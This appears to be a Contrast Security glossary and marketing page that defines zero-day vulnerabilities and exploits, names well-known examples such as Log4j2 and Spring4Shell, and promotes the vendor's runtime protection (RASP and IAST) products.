Zero day

What is the definition of "zero day?"

Also sometimes known as a “0 day,” a zero day is a flaw or potential security issue with software or hardware that, once made public, leaves the vendor, or whoever has developed the product or code in question, with zero days for providing a fix. While zero days can be found in hardware such as servers, in application security the biggest focus remains on zero days in open-source code. 

What is a zero-day vulnerability?

Zero-day vulnerabilities are those still “in the wild,” as in, no vendor has patched them yet. If ethical security researchers identify a vulnerability they will notify the vendor or responsible organization so that a patch can be issued before the vulnerability will be communicated. During a zero day event, however, it is usually discovered that criminal hackers are already exploiting a previously unknown vulnerability. Vendors will then have to scramble for publishing a patch. 

Zero-day vulnerabilities pose a higher risk to users for the following reasons:

• Cybercriminals race to exploit these vulnerabilities so as to cash in on their schemes before others are aware of the flaws. 
• Vulnerable systems are exposed until a patch is issued by the vendor and the patch is installed by all the vendor’s customers.

What is a zero-day exploit?

A zero-day attack is when a zero-day vulnerability is exploited, usually by a malicious actor. Many zero days exist in the wild, but not all are exploited. 

"Bad actors move fast, and often, zero-day unknowns hidden in the application can expose a security weakness even before an official vulnerability such as a CVE [Common Vulnerability and Exposure] is made public," said Jim Mercer, IDC Research Vice President, DevOps and DevSecOps.

What are the impacts of zero-day attacks?

Zero-day exploits can be especially damaging, as they often occur through vulnerabilities that an organization was completely unaware of previously. Ransomware and remote-access Trojans, among other issues, are often deployed after malicious exploitation of a zero-day vulnerability. Once an organization has been exploited through a zero day, its data may be stolen, its customers may be compromised, its systems may be shut down and more. In addition, there are instances where hackers may have access to internal systems and data for months or even years before being detected as a result of zero-day vulnerabilities. Because of the surprise element involved with a zero-day exploitation, these vulnerabilities can be especially pernicious. 

“Attackers aren't dumb. Exploiting zero-day vulnerabilities, especially those in open-source libraries, is an easy, and likely undetectable, way to gain full access to servers deep inside an organization's infrastructure,” said Contrast Security founder and CTO Jeff Williams.

Examples of zero-day vulnerabilities

Many of the biggest cybersecurity compromises began as zero-day vulnerabilities, including the Log4j2 vulnerability and the Spring4Shell vulnerability. The Sony compromise of 2014 is another notable attack that exposed a zero-day vulnerability.

Other notable, recent zero-day vulnerabilities:

• CVE-2023-22527 (A zero-day impacting the Atlassian Confluence Server discovered in early 2024).
• 2023 deserialization vulnerability in Spring-Kafka.
• The Struts vulnerability that impacted Equifax.
• CVE-2023-43472 (A zero day impacting MLflow discovered in 2023).

Initial response to open-source zero-day exploits

Traditionally most organizations will rely on their Web Application Firewall to protect them based on a given signature of an attack. Such fingerprinting is a delicate task as you do not want to block legitimate business and you do not want a slightly modified exploit to damage your organization either.

What if there was a way to be eventually protected against such exploits even before they are made public knowledge? If that sounds interesting, then have a look into Contrast Protect, Contrast Security’s RASP (Runtime Application Self-Protection) solution. Contrast Protect blocks more than 180,000 exploit attempts per week at the application level, adding an additional layer of protection inside your applications, just behind your WAF.

How to identify a zero-day vulnerability

Why are there so many uncaught vulnerabilities? Finding a vulnerability and providing the necessary context for fixing it is hard if traditional SAST and DAST tools are being used. SAST produces sufficient false positives so that providers of software often have to choose between developing a feature or between triaging and analyzing every single vulnerability report. Often, go-to-market objectives win over security considerations. DAST is not accurate enough and many vulnerabilities are not found. 

Either tool does not provide context so that developers can fix vulnerabilities easily. One lacks information on the concerned endpoint, making it hard to reproduce the issue. The other lacks insight into the code flow which makes it hard to pinpoint the right place where to fix an issue.

On the other hand, solutions that focus on behavior anomaly and detection, particularly during runtime, can identify anomalous behavior and stop issues even when a zero day is being exploited.

This is where security observability can help. When you have continuous runtime security context and visibility into application architecture and software composition, it’s possible to detect anomalous behavior and discover issues before a zero day is exploited. Securing software requires a defense-in-depth approach, and deploying runtime protection can help protect organizations’ applications and improve security posture. Runtime security can not only protect an application that may face threats in production, it can also provide valuable insights already when software is being developed and tested, enabling organizations to ship much cleaner software in the first place.

There is immense value in analyzing application code and data flows in real time. The goal is to have continuous, real-time security assessments throughout the application life cycle, which can ensure that vulnerabilities are identified and addressed as soon as they’re introduced.

More details on how to mitigate or prevent a zero-day attack: Best practices for zero-day attack prevention

The ultimate goal is to either find vulnerabilities before they’re discovered and reported, let alone before exploit code is released and to fix them, or to have a protection mechanism in place that can defend against attacks even before they are known.

Depending on traditional tools such as static Software Composition Analysis (SCA), that lacks the insight into which libraries are really used, web application firewalls (WAFs), that solely rely on signatures and lack the insight what would really cause harm in an application, and Static Application Security Testing (SAST) tools, that lack context and produce to many false alarms, to defend against zero-day attacks is extremely dangerous. 

When it comes to vulnerabilities, Runtime Security such as Runtime SCA and Interactive Application Security Testing (IAST) help already many organizations to avoid leaving attack vectors open. When it comes to zero day-defense, Runtime Application Protection (aka Runtime Application Self-Protection, or RASP, goes a long way. Runtime security is built into an application or application runtime environment. This means the technology can actually control application execution, detect vulnerabilities and thereby stop attacks in real time, regardless of where the app resides on the server.

Runtime protection automatically establishes trust boundaries inside the application, both in custom code and libraries. It ensures that many of the important classes of vulnerabilities cannot be exploited, with little performance overhead. It validates data requests directly inside the app and improves overall application by monitoring inputs and blocking those that could allow attacks. 

Essentially, RASP modifies your app structure instantly and transparently to ensure that your app is using safe coding patterns. It gives unprecedented visibility and protection, blocking attacks quickly and effectively until the underlying vulnerabilities can be addressed.

Runtime protection tools can often stop zero-day exploits, with no signature updates required. Not only do these runtime tools protect against zero days; they also protect well before the vulnerabilities are disclosed. 

IAST tools are another major player when it comes to preventing zero days: They actually showed log injection vulnerabilities in the affected apps months or years prior to the disclosure of Log4j. That information can empower software developers and DevOps teams, who used the data to prevent the problem with some simple, defensive coding techniques. IAST can do that because it evaluates the whole application at once, instead of separating custom code from open source, as do SAST and SCA. 

Value of using runtime security to detect and prevent zero-day attacks:

• Stop attacks immediately: Accurately detect and block application attacks and confirm if the exploit could reach its target: always-on protection for peace of mind.  
• Monitor applications for malicious behavior: Continuous security observability from inside the application with prioritized and confirmed vulnerabilities including contextual information that makes fixing easy.   

Instrument once and protect forever: Embedded runtime protection continuously monitors applications for threats with scalability to deploy without additional resources to maintain.

Specifically, it’s valuable to have pointed, code-level remediation guidance for those who need to  understand and to fix vulnerabilities. After all, developers will need to pinpoint exactly where a vulnerability appears in the code and how it works, so they can easily fix vulnerabilities without the need of security expertise. That way, not only is it possible to catch zero days before they are exploited, but the issues they pose can be easily and quickly remediated, as well.

"[O]rganizations lacking dedicated application security teams gain critical safeguards using solutions like Contrast Security Protect that defend against attacks using RASP [Runtime Application Self-Protection]," said Jim Mercer, IDC Research Vice President, DevOps and DevSecOps.

The benefits of Contrast Security runtime security for addressing zero-day vulnerabilities

The Contrast Runtime Security Platform was created in response to the fact that applications are perpetually accosted by hackers intent on doing harm to your business. We recognize that it is virtually impossible to create applications that are completely free of vulnerabilities. The Runtime Security agent continuously detects and prevents both known threats and zero-day attacks by leveraging multi-technique precision sensors and dynamic control over the runtime. It offers an instrumentation-based approach that simplifies security deployment and scalability. Using Runtime Security on any potentially insecure application can help to improve your security posture.